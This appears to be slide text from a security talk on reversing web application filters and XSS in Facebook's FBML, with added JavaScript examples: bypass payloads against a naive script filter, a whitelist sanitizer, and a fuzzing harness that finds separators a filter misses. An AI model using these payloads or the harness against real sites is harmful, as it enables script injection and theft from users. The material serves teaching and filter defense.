Alexander Sotirov
alex@sotirov.net
Reversing web apps
blackbox reversing
XSS in Facebook
Overview
Part I
User generated content
and Web 2.0
Web 2.0
APIs
Mashups
Text
Plaintext
Limited HTML
Flash
Attacker generated content
Social networking
Webmail
Blogs
Browser bugs
Features that allow scripting
Script tags
<script src="http://www.example.com/xss.js">
Event handler attributes
<body onload="alert('XSS')">
CSS
<p style="background:url('javascript:alert(1)')">
URLs
<img src="javascript:alert('XSS')">
Proprietary extensions to HTML
XML data islands (IE)
<xml src="http://www.example.com/xss.xml" id="x">
<span datasrc="#x" datafld="c" dataformatas="html">
JavaScript expressions in attributes (NS4)
<p id="&{alert('XSS')}">
Conditional comments (IE)
<!--[if gte IE 5]>
<script>alert('XSS')</script>
<![endif]-->
Parsing invalid HTML
<<scr\0ipt/src=http://xss.com/xss.js></script
Canonicalization
Whitelisting
String matching filters
Remove all script tags:
s/<script>//g;
Bypasses:
Incomplete blacklists
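An added example, written for this page and not taken from the slides or from any Facebook filter: the s/<script>//g; substitution above as a JavaScript function, together with inputs that leave executable script behind. The names naiveScriptFilter, stillExecutes, BYPASSES and repeatedScriptFilter are chosen here, and the payload list is constructed for the demonstration.

```javascript
// Added example, not from the slides: the string-matching filter s/<script>//g;
// as a JavaScript function, and inputs that leave executable script behind.
// naiveScriptFilter, stillExecutes, BYPASSES and repeatedScriptFilter are names chosen here.

// The filter: one case-sensitive pass that deletes the literal string "<script>".
function naiveScriptFilter(html) {
  return html.replace(/<script>/g, "");
}

// Rough check for "would a browser still run script from this?" It only needs to
// recognise the constructs used in the payloads below (an oracle for the
// demonstration, not a detector you would ship).
function stillExecutes(html) {
  return /<script[\s\/>]/i.test(html)    // a script tag in any case or with attributes
      || /\son\w+\s*=/i.test(html)         // an event handler attribute
      || /javascript:/i.test(html);        // a javascript: URL
}

// Constructed payloads. Each defeats the filter for a different reason.
const BYPASSES = [
  // Nesting: deleting the inner "<script>" once reassembles the outer one.
  "<scr<script>ipt>alert(1)</script>",
  // Case: the filter compares bytes, the browser compares tag names case-insensitively.
  "<SCRIPT>alert(1)</SCRIPT>",
  // Attributes: the literal "<script>" never appears when there is a src attribute.
  '<script src="http://www.example.com/xss.js"></script>',
  // No script tag at all: the scripting features from the earlier slides.
  '<body onload="alert(1)">',
  '<img src="javascript:alert(\'XSS\')">',
];

// Run a filter over the payloads and report which outputs still execute.
function evaluateFilter(filter, payloads = BYPASSES) {
  return payloads.map(input => {
    const output = filter(input);
    return { input, output, bypassed: stillExecutes(output) };
  });
}

// Applying the same substitution until nothing changes fixes only the nesting
// trick. The other four still pass: the blacklist is incomplete, not merely
// applied too few times.
function repeatedScriptFilter(html) {
  let prev;
  do { prev = html; html = naiveScriptFilter(html); } while (html !== prev);
  return html;
}
```

evaluateFilter(naiveScriptFilter) reports every payload as bypassed; evaluateFilter(repeatedScriptFilter) stops only the nested one, which is the point of the next slides: matching strings cannot be made complete, parsing can.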
HTML DOM parsers
<body onload="alert(1)">
<script>alert(2)</script>
<p>Hello</p>
</body>
Canonicalization
1. Build a DOM tree from the input stream
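An added example of canonicalization by parsing, written for this page; it is not the slides' code and not Facebook's. The input is tokenized into tags and text, a small tree is built from the tokens (step 1 above), and the output is re-serialized from that tree using only whitelisted elements and attributes, so nothing the parser did not understand can reach the output as markup. The whitelist ALLOWED, the sets VOID and DROP_CONTENT, and all function names are this example's own choices.

```javascript
// Added example, not from the slides and not Facebook's code: canonicalization by
// parsing. Tokenize, build a tree, serialize from the tree with a whitelist.
// ALLOWED, VOID, DROP_CONTENT and the function names are chosen here.

const ALLOWED = { p: [], b: [], i: [], br: [], a: ["href"] };  // element -> permitted attributes
const VOID = new Set(["br"]);                                  // elements that never have children
const DROP_CONTENT = new Set(["script", "style", "xml"]);      // dropped together with their text

// Attributes inside a tag: a name, optionally "=" and a quoted or bare value.
function parseAttrs(s) {
  const attrs = {};
  const re = /([a-zA-Z][\w-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(s)) !== null) attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  return attrs;
}

// Split the input into text and tag tokens. A tag is "<", optional "/", a name of
// letters and digits, then anything up to the next ">". Whatever does not fit
// (a tag without ">", a comment, a lone "<") is text, and text is always escaped.
function tokenize(html) {
  const re = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  const tokens = [];
  let last = 0, m;
  while ((m = re.exec(html)) !== null) {
    if (m.index > last) tokens.push({ type: "text", value: html.slice(last, m.index) });
    tokens.push({ type: m[1] ? "close" : "open", name: m[2].toLowerCase(), attrs: parseAttrs(m[3]) });
    last = re.lastIndex;
  }
  if (last < html.length) tokens.push({ type: "text", value: html.slice(last) });
  return tokens;
}

// Step 1 from the slide: build a tree. A close tag pops back to its nearest
// matching open tag; a close tag with no open tag is ignored.
function buildTree(tokens) {
  const root = { name: "#root", attrs: {}, children: [] };
  const stack = [root];
  for (const t of tokens) {
    const top = stack[stack.length - 1];
    if (t.type === "text") {
      top.children.push({ text: t.value });
    } else if (t.type === "open") {
      const node = { name: t.name, attrs: t.attrs, children: [] };
      top.children.push(node);
      if (!VOID.has(t.name)) stack.push(node);
    } else {
      for (let i = stack.length - 1; i > 0; i--) {
        if (stack[i].name === t.name) { stack.length = i; break; }
      }
    }
  }
  return root;
}

function escapeText(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// Only absolute http(s) URLs survive; javascript:, data:, vbscript: and friends are dropped.
function safeHref(v) {
  return /^https?:\/\//i.test(v.trim()) ? v.trim() : null;
}

// Serialize from the tree, never from the input. Unknown elements vanish but their
// text content stays (escaped); script-like elements vanish together with content.
function serialize(node) {
  let out = "";
  for (const c of node.children) {
    if ("text" in c) { out += escapeText(c.text); continue; }
    if (DROP_CONTENT.has(c.name)) continue;
    if (!(c.name in ALLOWED)) { out += serialize(c); continue; }
    let attrs = "";
    for (const a of ALLOWED[c.name]) {
      if (c.attrs[a] === undefined) continue;
      const v = a === "href" ? safeHref(c.attrs[a]) : c.attrs[a];
      if (v !== null) attrs += ` ${a}="${escapeText(v)}"`;
    }
    out += VOID.has(c.name) ? `<${c.name}${attrs}>` : `<${c.name}${attrs}>${serialize(c)}</${c.name}>`;
  }
  return out;
}

function canonicalize(html) {
  return serialize(buildTree(tokenize(html)));
}
```

Fed the four-line input from the previous slide, canonicalize returns only <p>Hello</p>: the onload attribute, the script element and the stray body wrapper never exist in the tree that is serialized. The conditional-comment, null-byte and javascript: URL vectors from the earlier slides come out as escaped text or disappear for the same reason, which is what makes a parser-based whitelist finishable where a blacklist is not.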
Remote web applications
Fuzzing
draws attention
Blackbox reversing
whitespace regexp: \x0B, \t, \r, \n and space
result diffing
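An added example of the two techniques just named, fuzzing and result diffing, applied to recovering a filter's whitespace regexp; it is written for this page and is not from the slides. The filter under test and the browser are constructed local stand-ins (remoteFilter with the assumed regexp FILTER_WS, and browserStandIn) so that the harness runs offline; in a real engagement each probe is one request to the application and the browser side is a rendering test. All names are this example's own.

```javascript
// Added example, not from the slides: blackbox reversing of a filter's whitespace
// regexp by fuzzing one byte at a time and diffing the results.
// remoteFilter, browserStandIn and FILTER_WS are constructed stand-ins; the names are mine.

// Stand-in for the filter under test: it splits a tag on what it believes is
// whitespace and rejects the tag if any later token is an event handler attribute.
const FILTER_WS = /[\t\n\r ]+/;        // assumption: the unknown regexp we want to recover
function remoteFilter(tag) {
  const parts = tag.slice(1, -1).split(FILTER_WS);
  return parts.slice(1).some(p => /^on\w+=/i.test(p)) ? "" : tag;
}

// Stand-in for the browser: the HTML tokenizer treats TAB, LF, FF, CR and SPACE as
// whitespace inside a tag, so any of them separates the tag name from an attribute.
const BROWSER_WS = /[\t\n\f\r ]+/;
function browserStandIn(tag) {
  const parts = tag.slice(1, -1).split(BROWSER_WS);
  return parts.slice(1).some(p => /^on\w+=/i.test(p)) ? "" : tag;
}

// One probe per candidate byte: the only thing that changes is the separator.
function probe(byte) {
  return `<img${String.fromCharCode(byte)}onload=alert(1)>`;
}

// Result diffing: the response to a known separator (space) is the baseline for
// "the filter saw the handler". Every byte whose response matches that baseline
// was treated as whitespace; every other byte was swallowed into the tag name.
// Against a real application, strip the probe byte from the response first.
function separatorsOf(oracle, bytes = [...Array(256).keys()]) {
  const baseline = oracle(probe(0x20));
  return bytes.filter(b => oracle(probe(b)) === baseline);
}

// The interesting output: bytes the browser splits on but the filter does not.
// Each one is a separator the attacker can use and the filter cannot see.
function blindSpots(filterOracle, browserOracle) {
  const seen = new Set(separatorsOf(filterOracle));
  return separatorsOf(browserOracle).filter(b => !seen.has(b));
}
```

With the stand-ins above, separatorsOf(remoteFilter) recovers the four bytes of FILTER_WS from responses alone, and blindSpots(remoteFilter, browserStandIn) returns [12], the form feed: the one separator this particular filter never splits on. Swap in an HTTP client for remoteFilter and the same loop recovers the real regexp one byte per request.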
Application modules
Test modules
application pages
FBML
FBJS
sandboxed JavaScript
FBML processing
browser -> apps.facebook.com -> funapp.example.com
HTML (returned to the browser), FBML (returned by the app)
GET /funapp/foo.html -> GET /foo.html
FBML processing:
Canonicalized output
Blackbox reversing